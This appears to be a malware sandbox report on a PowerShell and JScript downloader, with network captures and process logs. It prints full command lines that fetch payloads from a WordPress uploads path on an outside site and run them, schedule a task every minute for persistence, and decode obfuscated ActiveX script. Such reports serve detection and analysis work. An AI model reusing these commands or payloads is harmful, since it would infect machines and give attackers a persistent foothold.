                                              Date: Tue, 03 Dec 2024 08:14:04 GMT
                                              Server: Apache
                                              Upgrade: h2,h2c
                                              Connection: Upgrade, close
                                              Vary: Accept-Encoding
                                              Referrer-Policy: no-referrer-when-downgrade
                                              Transfer-Encoding: chunked
                                              Content-Type: text/html; charset=UTF-8
                                              2024-12-03 08:14:04 UTC18INData Raw: 38 0d 0a 77 73 63 72 69 70 74 20 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 8wscript 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.54970546.254.34.2014434508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-03 08:14:06 UTC92OUTGET /wp-content/uploads/2021/05/butterfliesxH2dz.php HTTP/1.1
                                              Host: www.italialife24.it
                                              2024-12-03 08:14:06 UTC253INHTTP/1.1 200 OK
                                              Date: Tue, 03 Dec 2024 08:14:06 GMT
                                              Server: Apache
                                              Upgrade: h2,h2c
                                              Connection: Upgrade, close
                                              Vary: Accept-Encoding
                                              Referrer-Policy: no-referrer-when-downgrade
                                              Transfer-Encoding: chunked
                                              Content-Type: text/html; charset=UTF-8
                                              2024-12-03 08:14:06 UTC316INData Raw: 31 33 30 0d 0a 76 61 72 20 66 6e 6e 20 3d 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 57 53 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 0d 0a 66 6e 6e 2e 52 75 6e 28 22 70 6f 77 65 72 73 68 65 6c 6c 20 2d 63 6f 6d 6d 61 6e 64 20 5c 22 49 57 52 20 2d 6f 75 74 66 69 20 24 65 6e 76 3a 70 72 6f 67 72 61 6d 64 61 74 61 5c 5c 4d 37 37 4d 37 35 50 31 5a 51 57 31 2e 6a 73 20 2d 75 73 65 62 61 73 69 20 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 74 61 6c 69 61 6c 69 66 65 32 34 2e 69 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 31 2f 30 35 2f 61 66 72 65 74 50 66 2e 70 68 70 27 3b 20 73 63 68 74 61 73 6b 73 20 2f 64 65 6c 65 74 65 20 2f 74 6e 20 22 20 2b 20 57 53 63 72 69 70 74 2e 61 72 67 75 6d 65 6e 74 73 28 30 29 20 2b 20 22
                                              Data Ascii: 130var fnn = new ActiveXObject("WScript.Shell")fnn.Run("powershell -command \"IWR -outfi $env:programdata\\M77M75P1ZQW1.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn " + WScript.arguments(0) + "


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.54970646.254.34.2014431436C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-03 08:14:12 UTC202OUTGET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                              Host: www.italialife24.it
                                              Connection: Keep-Alive
                                              2024-12-03 08:14:13 UTC253INHTTP/1.1 200 OK
                                              Date: Tue, 03 Dec 2024 08:14:12 GMT
                                              Server: Apache
                                              Upgrade: h2,h2c
                                              Connection: Upgrade, close
                                              Vary: Accept-Encoding
                                              Referrer-Policy: no-referrer-when-downgrade
                                              Transfer-Encoding: chunked
                                              Content-Type: text/html; charset=UTF-8
                                              2024-12-03 08:14:13 UTC1300INData Raw: 35 30 38 0d 0a 76 61 72 20 66 31 3d 22 53 63 72 22 2c 66 32 3d 22 69 6e 67 2e 46 69 22 2c 66 33 3d 22 73 74 65 6d 4f 62 22 0a 76 61 72 20 66 73 6f 20 3d 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 66 31 2b 22 69 70 74 22 2b 66 32 2b 22 6c 65 53 79 22 2b 66 33 2b 22 6a 65 63 74 22 29 0a 76 61 72 20 77 31 3d 22 57 53 63 22 2c 77 32 3d 22 72 69 50 74 22 2c 77 34 3d 22 65 4c 6c 22 0a 76 61 72 20 77 73 68 3d 77 31 2b 77 32 2b 22 2e 73 48 22 2b 77 34 0a 76 61 72 20 62 62 6a 3d 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 77 73 68 29 0a 76 61 72 20 66 6c 64 72 3d 47 65 74 4f 62 6a 65 63 74 28 22 77 69 6e 6d 67 6d 74 73 3a 72 6f 6f 74 5c 5c 63 69 6d 76 32 3a 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 3d 27 63 70 75 30 27 22 29 2e 41 64 64
                                              Data Ascii: 508var f1="Scr",f2="ing.Fi",f3="stemOb"var fso = new ActiveXObject(f1+"ipt"+f2+"leSy"+f3+"ject")var w1="WSc",w2="riPt",w4="eLl"var wsh=w1+w2+".sH"+w4var bbj=new ActiveXObject(wsh)var fldr=GetObject("winmgmts:root\\cimv2:Win32_Processor='cpu0'").Add


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.54980346.254.34.2014432360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-03 08:15:06 UTC202OUTGET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                              Host: www.italialife24.it
                                              Connection: Keep-Alive
                                              2024-12-03 08:15:07 UTC253INHTTP/1.1 200 OK
                                              Date: Tue, 03 Dec 2024 08:15:06 GMT
                                              Server: Apache
                                              Upgrade: h2,h2c
                                              Connection: Upgrade, close
                                              Vary: Accept-Encoding
                                              Referrer-Policy: no-referrer-when-downgrade
                                              Transfer-Encoding: chunked
                                              Content-Type: text/html; charset=UTF-8
                                              2024-12-03 08:15:07 UTC1300INData Raw: 35 30 38 0d 0a 76 61 72 20 66 31 3d 22 53 63 72 22 2c 66 32 3d 22 69 6e 67 2e 46 69 22 2c 66 33 3d 22 73 74 65 6d 4f 62 22 0a 76 61 72 20 66 73 6f 20 3d 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 66 31 2b 22 69 70 74 22 2b 66 32 2b 22 6c 65 53 79 22 2b 66 33 2b 22 6a 65 63 74 22 29 0a 76 61 72 20 77 31 3d 22 57 53 63 22 2c 77 32 3d 22 72 69 50 74 22 2c 77 34 3d 22 65 4c 6c 22 0a 76 61 72 20 77 73 68 3d 77 31 2b 77 32 2b 22 2e 73 48 22 2b 77 34 0a 76 61 72 20 62 62 6a 3d 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 77 73 68 29 0a 76 61 72 20 66 6c 64 72 3d 47 65 74 4f 62 6a 65 63 74 28 22 77 69 6e 6d 67 6d 74 73 3a 72 6f 6f 74 5c 5c 63 69 6d 76 32 3a 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 3d 27 63 70 75 30 27 22 29 2e 41 64 64
                                              Data Ascii: 508var f1="Scr",f2="ing.Fi",f3="stemOb"var fso = new ActiveXObject(f1+"ipt"+f2+"leSy"+f3+"ject")var w1="WSc",w2="riPt",w4="eLl"var wsh=w1+w2+".sH"+w4var bbj=new ActiveXObject(wsh)var fldr=GetObject("winmgmts:root\\cimv2:Win32_Processor='cpu0'").Add


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.54993246.254.34.2014434368C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-03 08:16:05 UTC202OUTGET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                              Host: www.italialife24.it
                                              Connection: Keep-Alive
                                              2024-12-03 08:16:05 UTC253INHTTP/1.1 200 OK
                                              Date: Tue, 03 Dec 2024 08:16:05 GMT
                                              Server: Apache
                                              Upgrade: h2,h2c
                                              Connection: Upgrade, close
                                              Vary: Accept-Encoding
                                              Referrer-Policy: no-referrer-when-downgrade
                                              Transfer-Encoding: chunked
                                              Content-Type: text/html; charset=UTF-8
                                              2024-12-03 08:16:05 UTC1300INData Raw: 35 30 38 0d 0a 76 61 72 20 66 31 3d 22 53 63 72 22 2c 66 32 3d 22 69 6e 67 2e 46 69 22 2c 66 33 3d 22 73 74 65 6d 4f 62 22 0a 76 61 72 20 66 73 6f 20 3d 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 66 31 2b 22 69 70 74 22 2b 66 32 2b 22 6c 65 53 79 22 2b 66 33 2b 22 6a 65 63 74 22 29 0a 76 61 72 20 77 31 3d 22 57 53 63 22 2c 77 32 3d 22 72 69 50 74 22 2c 77 34 3d 22 65 4c 6c 22 0a 76 61 72 20 77 73 68 3d 77 31 2b 77 32 2b 22 2e 73 48 22 2b 77 34 0a 76 61 72 20 62 62 6a 3d 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 77 73 68 29 0a 76 61 72 20 66 6c 64 72 3d 47 65 74 4f 62 6a 65 63 74 28 22 77 69 6e 6d 67 6d 74 73 3a 72 6f 6f 74 5c 5c 63 69 6d 76 32 3a 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 3d 27 63 70 75 30 27 22 29 2e 41 64 64
                                              Data Ascii: 508var f1="Scr",f2="ing.Fi",f3="stemOb"var fso = new ActiveXObject(f1+"ipt"+f2+"leSy"+f3+"ject")var w1="WSc",w2="riPt",w4="eLl"var wsh=w1+w2+".sH"+w4var bbj=new ActiveXObject(wsh)var fldr=GetObject("winmgmts:root\\cimv2:Win32_Processor='cpu0'").Add


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:03:13:59
                                              Start date:03/12/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $NcO7enPofW2RuhM1 = New-Object Net.WebClient; $cio = $NcO7enPofW2RuhM1.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $NcO7enPofW2RuhM1.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', '7Jb5KYoTpe8IWE.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('7Jb5KYoTpe8IWE.js ' * 2)) /tn 48dYPKZW1;
                                              Imagebase:0x7ff7be880000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:1
                                              Start time:03:13:59
                                              Start date:03/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6d64d0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:3
                                              Start time:03:14:05
                                              Start date:03/12/2024
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js " /tn 48dYPKZW1
                                              Imagebase:0x7ff710bc0000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:4
                                              Start time:03:14:06
                                              Start date:03/12/2024
                                              Path:C:\Windows\System32\wscript.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js
                                              Imagebase:0x7ff7300a0000
                                              File size:170'496 bytes
                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:5
                                              Start time:03:14:07
                                              Start date:03/12/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\M77M75P1ZQW1.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn 7Jb5KYoTpe8IWE.js /f; wscript $env:programdata\M77M75P1ZQW1.js "
                                              Imagebase:0x7ff7be880000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:6
                                              Start time:03:14:07
                                              Start date:03/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6d64d0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:7
                                              Start time:03:14:12
                                              Start date:03/12/2024
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\system32\schtasks.exe" /delete /tn 7Jb5KYoTpe8IWE.js /f
                                              Imagebase:0x7ff710bc0000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:8
                                              Start time:03:14:12
                                              Start date:03/12/2024
                                              Path:C:\Windows\System32\wscript.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\system32\wscript.exe" C:\ProgramData\M77M75P1ZQW1.js
                                              Imagebase:0x7ff7300a0000
                                              File size:170'496 bytes
                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:11
                                              Start time:03:15:01
                                              Start date:03/12/2024
                                              Path:C:\Windows\System32\wscript.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js
                                              Imagebase:0x7ff7300a0000
                                              File size:170'496 bytes
                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:12
                                              Start time:03:15:02
                                              Start date:03/12/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\M77M75P1ZQW1.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn 7Jb5KYoTpe8IWE.js /f; wscript $env:programdata\M77M75P1ZQW1.js "
                                              Imagebase:0x7ff7be880000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:13
                                              Start time:03:15:02
                                              Start date:03/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6d64d0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:14
                                              Start time:03:15:07
                                              Start date:03/12/2024
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\system32\schtasks.exe" /delete /tn 7Jb5KYoTpe8IWE.js /f
                                              Imagebase:0x7ff710bc0000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:15
                                              Start time:03:15:07
                                              Start date:03/12/2024
                                              Path:C:\Windows\System32\wscript.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\system32\wscript.exe" C:\ProgramData\M77M75P1ZQW1.js
                                              Imagebase:0x7ff7300a0000
                                              File size:170'496 bytes
                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:16
                                              Start time:03:16:00
                                              Start date:03/12/2024
                                              Path:C:\Windows\System32\wscript.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js
                                              Imagebase:0x7ff7300a0000
                                              File size:170'496 bytes
                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:17
                                              Start time:03:16:01
                                              Start date:03/12/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\M77M75P1ZQW1.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn 7Jb5KYoTpe8IWE.js /f; wscript $env:programdata\M77M75P1ZQW1.js "
                                              Imagebase:0x7ff7be880000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              General

                                              Target ID:18
                                              Start time:03:16:01
                                              Start date:03/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6d64d0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Disassembly

                                              Reset < >

                                                Executed Functions

                                                Function 00007FF848FF10C9 Relevance: .2, Instructions: 203COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2112813222.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff848ff0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 97137056fb4c422910ff9751c50b914307751f51773ac44d8a638c4a56f4dd80
                                                • Instruction ID: 10e363c22e25c42cfc5155a804ae1a9ee15b7820c99f1d4af019ae156be7e946
                                                • Opcode Fuzzy Hash: 97137056fb4c422910ff9751c50b914307751f51773ac44d8a638c4a56f4dd80
                                                • Instruction Fuzzy Hash: 3B512931E1EA864FFB9AA76C68521B972D1EF412A0F0401BFD10DC31D3EF19A8858359
                                                Function 00007FF848FF0DAE Relevance: .2, Instructions: 196COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2112813222.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff848ff0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1ade1a67d91995cec2296572876d4c880903eca3a4c5db3ad9ead24223ae94fa
                                                • Instruction ID: 6bc1d75b05c67a6d5dbba821e652b5013dc1a828b30153000f64643e8e09e5b1
                                                • Opcode Fuzzy Hash: 1ade1a67d91995cec2296572876d4c880903eca3a4c5db3ad9ead24223ae94fa
                                                • Instruction Fuzzy Hash: D851C432E1EA8A5FFBA9B72C14512B966D1EF95790F4801BBDA09C71D3DF08A8048359
                                                Function 00007FF848FF0DFA Relevance: .1, Instructions: 116COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2112813222.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff848ff0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3bcb349629ed9fb3b3716184e55cba09328bbb5b7c7b36c7c40fccead8152f42
                                                • Instruction ID: b78565f0db10988c0971c71fe7423021908696be5244eca59d94d2caf05aa716
                                                • Opcode Fuzzy Hash: 3bcb349629ed9fb3b3716184e55cba09328bbb5b7c7b36c7c40fccead8152f42
                                                • Instruction Fuzzy Hash: 29318D32E1FA874FF7A9B32C186517865D1EF956A1F4800BBEA4DC71D2DF0C68484619
                                                Function 00007FF848FF1117 Relevance: .1, Instructions: 111COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2112813222.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff848ff0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bada9dbc8acce1d8a7254657d4bb2420e9e342188ac7d6b359f5187a60a97890
                                                • Instruction ID: 3950a7300cf2834465ba913ab46435c2765506b15345f10f427700d087215a2a
                                                • Opcode Fuzzy Hash: bada9dbc8acce1d8a7254657d4bb2420e9e342188ac7d6b359f5187a60a97890
                                                • Instruction Fuzzy Hash: 1A31E631E1EA875FF79AA76818511B866E1EF412E0F4801BFE50DC71D3EF1DA8848319
                                                Function 00007FF848F24575 Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2112443848.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff848f20000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1debed1cd3dcf2c6d5a59f81a24dc7f9c616c02eac16cdb6873cce387dbdfbbb
                                                • Instruction ID: ac0db5a2b46ab5e31644ca895db791bd2fd185d506caab6d23dde113e213c2e2
                                                • Opcode Fuzzy Hash: 1debed1cd3dcf2c6d5a59f81a24dc7f9c616c02eac16cdb6873cce387dbdfbbb
                                                • Instruction Fuzzy Hash: DD01677111CB0C8FD744EF0CE451AA5B7E0FB95364F10056EE58AC3695DB36E881CB45

                                                Executed Functions

                                                Function 00007FF848F133B5 Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2228465731.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ff848f10000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                • Instruction ID: 191617ceee889ec1b776a361fbb2d1250ce1ead809f4672e64413ffe75dfec08
                                                • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                • Instruction Fuzzy Hash: 7201677111CB0C4FDB44EF0CE451AA5B7E0FB95364F10056EE58AC3695DB36E882CB45